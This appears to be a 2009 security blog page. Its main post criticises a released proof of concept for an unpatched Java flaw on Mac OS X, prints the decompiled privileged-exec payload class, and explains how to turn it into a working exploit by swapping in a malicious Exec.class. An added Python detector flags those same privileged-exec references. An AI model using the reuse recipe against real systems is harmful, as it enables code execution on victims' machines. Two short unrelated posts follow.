Malware Activity

2009-05-20

Unresponsible Disclosure: The MacOS X Java Bug

Landon Fuller decided to publish a proof of concept for a Sun Java VM vulnerability that is still unpatched on Mac OS X. I agree that after this timespan it was necessary to demonstrate how easy it is to exploit this vulnerability; however, he decided to make it trivial to build your own exploit from it.

You can easily fetch HelloWorldApplet.class from his page and look at a version decompiled with JAD. He uses his own loader package fun.FunLoader, so grab fun/FunLoader.class as well. HelloWorldApplet also uses javax/Exec.class and Exec$1.class, and if we decompile that, it is trivial to spot how to craft your own exploit:

package javax;

import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

// javax.Exec as decompiled by JAD; the decompiler's synthetic fields
// (val$cmd, this$0) and its broken initializer block are dropped so the
// class reads as valid Java. Behaviour is unchanged.
public class Exec
{

    public Exec()
    {
        try
        {
            // The command the privileged action runs: the PoC only makes the Mac speak.
            final String cmd[] = {
                "/usr/bin/say", "I am executing an innocuous user process"
            };
            // Runtime.exec under doPrivileged: this is the spot the text refers to.
            AccessController.doPrivileged(new PrivilegedExceptionAction() {

                public Object run()
                    throws Exception
                {
                    Runtime.getRuntime().exec(cmd);
                    return null;
                }
            });
        }
        catch(Exception exception)
        {
            throw new RuntimeException("Exec failed", exception);
        }
    }
}

You can even recycle all the .class files and his t.tmp serialized input stream; just replace Exec.class in your local copy with your malicious payload.

Now this is unresponsible disclosure: if it is so dead-easy to build your own exploit from it, it is almost easier than writing a custom shellcode for an existing exploit.
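One way to triage applet classes for the pattern the decompiled Exec class shows, as an added example that is not part of this post: a small Python parser for the class-file constant pool (JVM spec section 4.4) that flags the AccessController, doPrivileged and Runtime.exec references such a payload class must carry. The class-file bytes it scans are constructed inline; build_sample_class and the INDICATORS list are assumptions of this example.

```python
import struct

# Constant-pool tag -> fixed payload size in bytes; Utf8 (tag 1) is variable-length.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

# Strings whose presence in an applet class warrants a closer look; the
# decompiled Exec class references every one of them.
INDICATORS = ("java/security/AccessController", "doPrivileged",
              "java/lang/Runtime", "exec")

def constant_pool_strings(data):
    """Return every CONSTANT_Utf8 entry of a .class file, in pool order."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count, = struct.unpack(">H", data[8:10])   # constant_pool_count
    pos, idx, out = 10, 1, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            length, = struct.unpack(">H", data[pos:pos + 2])
            out.append(data[pos + 2:pos + 2 + length].decode("utf-8", "replace"))
            pos += 2 + length
        elif tag in _FIXED:
            pos += _FIXED[tag]
        else:
            raise ValueError("unknown constant pool tag %d at offset %d" % (tag, pos - 1))
        # Long and Double take two pool slots (JVM spec 4.4.5).
        idx += 2 if tag in (5, 6) else 1
    return out

def suspicious_references(data):
    """Indicators from INDICATORS that appear in the class's constant pool."""
    strings = set(constant_pool_strings(data))
    return [s for s in INDICATORS if s in strings]

def build_sample_class(entries):
    """Constructed test input: class-file header plus a pool of Utf8 (str) and Long (int) entries."""
    pool, slots = b"", 0
    for e in entries:
        if isinstance(e, str):
            raw = e.encode("utf-8")
            pool += b"\x01" + struct.pack(">H", len(raw)) + raw
            slots += 1
        else:
            pool += b"\x05" + struct.pack(">q", e)   # CONSTANT_Long, two slots
            slots += 2
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 49, slots + 1) + pool

if __name__ == "__main__":
    sample = build_sample_class(["javax/Exec", "java/security/AccessController", 42,
                                 "doPrivileged", "java/lang/Runtime", "exec", "java/lang/Object"])
    print(suspicious_references(sample))
```

Real class files carry fields, methods and attributes after the pool; the parser stops once the pool is consumed, so those bytes are ignored.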


2009-05-10

Death of a X200s Display

Attraction is...

... if you still talk to her.

(I made her crawl on the floor and whimper, though.)


2009-05-08

libdasm @ Google Code

Since `jt' apparently no longer has the time or the inclination to maintain libdasm, Ange Albertini has taken on the task and created a new Google Code project for libdasm (libdasm was public domain anyway) to maintain it; my recent FPU fix is already included, and I will try to get people like Silvio Cesare to add their fixes and patches as well. Thanks Ange for stepping forward!
